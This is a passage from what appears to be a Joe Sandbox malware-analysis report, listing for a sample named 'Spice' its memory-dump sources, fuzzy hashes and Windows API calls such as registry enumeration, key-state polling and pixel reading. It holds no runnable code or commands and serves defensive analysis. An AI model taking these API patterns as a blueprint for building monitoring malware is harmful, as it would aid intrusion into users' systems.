                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2364364464-0
                                                                                                                                                                                                                                      • Opcode ID: c98269ef04cc57adf99ed8fcc06484365e54c61d75b40746bae816af3cfd1f5d
                                                                                                                                                                                                                                      • Instruction ID: aee79716f05c786eb533f8d79382719646159b6df56b81ffef018386f40af0f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c98269ef04cc57adf99ed8fcc06484365e54c61d75b40746bae816af3cfd1f5d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F58171B16007009FD720EF29D846F2AB7E5AF48710F14D91DFA99EB2D2D7B0AC408B91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                        • Part of subcall function 00EF147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF040D,?,?), ref: 00EF1491
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF075D
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF079C
                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EF07E3
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00EF080F
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF081C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3440857362-0
                                                                                                                                                                                                                                      • Opcode ID: 2c062d725d7c877c5e34668049d26d4b3d77d20e0215dc13383034ce929a47f1
                                                                                                                                                                                                                                      • Instruction ID: 20c9ba1a65367ff9e69ca693eef2a612e4fdd26124f537a63c54e911106af98b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c062d725d7c877c5e34668049d26d4b3d77d20e0215dc13383034ce929a47f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D517B71208208AFD704EF64C881F7AB7E9FF84304F14995DF699A72A2DB31E905DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EDEC62
                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EDEC8B
                                                                                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EDECCA
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EDECEF
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EDECF7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1389676194-0
                                                                                                                                                                                                                                      • Opcode ID: 6e1c96b695494951047d2b3522942ff0d337293e2d2110305a1c6907a36816e8
                                                                                                                                                                                                                                      • Instruction ID: f1cd74c61c42f6b9a7cde6b9c6462600d3bab7834bedfd222ceb9038cbd393c2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e1c96b695494951047d2b3522942ff0d337293e2d2110305a1c6907a36816e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28513775A00109DFCB11EF64C985AAEBBF5EF09314B188099E949BB3A2CB31ED51DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d27e7bd200f4b5aa9668ad02d7fa0f33921189be02a0c9ba76f9117d8f284b3f
                                                                                                                                                                                                                                      • Instruction ID: c994aa9fd350eadb5626ec13b1aa2979916f877838bcfd10b4392317a403c48f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d27e7bd200f4b5aa9668ad02d7fa0f33921189be02a0c9ba76f9117d8f284b3f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4841C4B590410CAFD710EF28CC44FB9BBB9AB09314F195176FA19BB2D1C770AD41DA51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00E72727
                                                                                                                                                                                                                                      • ScreenToClient.USER32(00F377B0,?), ref: 00E72744
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00E72769
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00E72777
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4210589936-0
                                                                                                                                                                                                                                      • Opcode ID: c5fcf22ae97c3a9b3b909dc72a326427859ece80fbc60cfb7cc555b730acf2ea
                                                                                                                                                                                                                                      • Instruction ID: b7367803c79e423a2890cb380e678d4c5fddfef32dbd17ce17737e592ef56277
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5fcf22ae97c3a9b3b909dc72a326427859ece80fbc60cfb7cc555b730acf2ea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D419435504109FFDF199F68C944AF9BBB4FB0A324F20935AF928B6290CB31AD54DB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EC95E8
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00EC9692
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EC969A
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00EC96A8
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EC96B0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                                                                                                      • Opcode ID: 17960fe840dd788ab8870d42dbfcf8f512263a1ee3ecb8a17a19da67f1664770
                                                                                                                                                                                                                                      • Instruction ID: 06ef89984dcc52e3bab5ea87dbc30b1267b5d4b45f1a9bf78f05f7b4d64edc0f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17960fe840dd788ab8870d42dbfcf8f512263a1ee3ecb8a17a19da67f1664770
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB31EC71900219EFDB10CF68DA4CF9E3BB9FB44319F104228F824AB2D2C7B19920DB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00ECBD9D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ECBDBA
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ECBDF2
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ECBE18
                                                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 00ECBE22
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3902887630-0
                                                                                                                                                                                                                                      • Opcode ID: 8de1b603e052205123d4f7a58c199d9692d6486b3fc34476284209b5450ad68a
                                                                                                                                                                                                                                      • Instruction ID: 5fd7bbe06646a36f9d45d6c121324993e9ad500fa609c9a521c2c797ae7077b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8de1b603e052205123d4f7a58c199d9692d6486b3fc34476284209b5450ad68a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F210432204208BEEF255B759D4AFBB7B9DEF44B60F10502DFD09EA191EF62CC4196A0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EFB804
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EFB829
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EFB841
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00EFB86A
                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EE155C,00000000), ref: 00EFB888
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2294984445-0
                                                                                                                                                                                                                                      • Opcode ID: 4afe5fe8ea2435d7c47f7834d34a78ced605175fd8fe86214156b817ed44c48a
                                                                                                                                                                                                                                      • Instruction ID: 97122ac78d1bf0dc9930fc1822752236d61fad204ff201c13a6e47f229e1e720
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4afe5fe8ea2435d7c47f7834d34a78ced605175fd8fe86214156b817ed44c48a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE21917191425DAFCB249F38CC08B7A3BA9FB45775F245729FA25E61E0E7309810DB80
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00EE6159
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00EE6170
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EE61AC
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00EE61B8
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00EE61F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4156661090-0
                                                                                                                                                                                                                                      • Opcode ID: a6851758687f35a78a8144feb7a87c6a07d87feb4a2a9d32e7208d6ee7166a7c
                                                                                                                                                                                                                                      • Instruction ID: 08ce8cdafd7e248ea2fbcf36585dad186accbed6f92565c9745355b2c11cff2f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6851758687f35a78a8144feb7a87c6a07d87feb4a2a9d32e7208d6ee7166a7c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7221A175A01608EFD710EF65DD84A9ABBF9FF88350F048469E94AA7352CE70AC01DB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E71729
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00E71738
                                                                                                                                                                                                                                      • BeginPath.GDI32(?), ref: 00E7174F
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00E71778
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3225163088-0
                                                                                                                                                                                                                                      • Opcode ID: 15e30d01a8e7a0444d97b74d9428c7ac1f96baad8b6090611acace06bdf59573
                                                                                                                                                                                                                                      • Instruction ID: 5f18ca7667ba3f50f23ab71c12f8daea8b2073eec275003654da739024826cbc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15e30d01a8e7a0444d97b74d9428c7ac1f96baad8b6090611acace06bdf59573
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5621B67040430CEFDB20AF68DC4876E7BFAF701325F248256F919B61A0D7709951EB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2931989736-0
                                                                                                                                                                                                                                      • Opcode ID: 464bf2a66e1aa3dc61d52391c25874fd00bcfe309221264de9c43d9991c2769e
                                                                                                                                                                                                                                      • Instruction ID: 2a2f13de2a81e9caa5be53f5cce91f9a48e7de37439dc5874be391165beceded
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 464bf2a66e1aa3dc61d52391c25874fd00bcfe309221264de9c43d9991c2769e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E001F963B441057BE60861105E42FFB739C9A60348F14502DFE0AB6342F752FE12A2E1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00ED5075
                                                                                                                                                                                                                                      • __beginthreadex.LIBCMT ref: 00ED5093
                                                                                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00ED50A8
                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00ED50BE
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00ED50C5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3824534824-0
                                                                                                                                                                                                                                      • Opcode ID: 29046dfc30ebf086cb5d0271906aaeed4fa578311cd5e9ddab99ce43dfcdf470
                                                                                                                                                                                                                                      • Instruction ID: 78cae69a2ca4f08e397b0c1c0e56819a33b16ca4f51660953b77e7555b1ee77f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29046dfc30ebf086cb5d0271906aaeed4fa578311cd5e9ddab99ce43dfcdf470
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 371104B290870CBBCB119BA89C04B9B7BADEB45321F14425AFC14E3390DA7189459BF1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EC8E3C
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00EC8900,?,?,?), ref: 00EC8E46
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00EC8900,?,?,?), ref: 00EC8E55
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00EC8900,?,?,?), ref: 00EC8E5C
                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EC8E73
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
